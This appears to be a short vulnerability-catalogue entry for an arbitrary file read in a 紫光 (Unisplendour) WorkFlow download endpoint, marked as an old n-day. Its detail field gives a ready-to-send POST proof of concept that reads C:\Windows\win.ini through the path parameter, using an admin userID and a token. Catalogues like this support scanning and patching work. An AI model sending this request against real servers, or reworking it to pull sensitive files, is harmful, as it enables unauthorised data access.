vendor = "紫光"
name = "紫光System WorkFlow download任意文件读取"
type = "任意文件读取"
version = "未知"
path = "/System/WorkFlow/download.html"
detail = "POST /System/WorkFlow/download.html?path=C:\\Windows\\win.ini HTTP/1.1 Accept-Encoding: gzip, deflate --vow8ojiofbpypwih3t3i Content-Disposition: form-data; name=\"userID\" admin --vow8ojiofbpypwih3t3i Content-Disposition: form-data; name=\"fondsid\" 1 --vow8ojiofbpypwih3t3i Content-Disposition: form-data; name=\"comid\" 1 --vow8ojiofbpypwih3t3i Content-Disposition: form-data; name=\"token\" 5117e82385cef4c12547fdd4c028b97a1-1 --vow8ojiofbpypwih3t3i--"
fix = "老洞"
date = "0704"
label = "nday"
verifier = "AdySec"
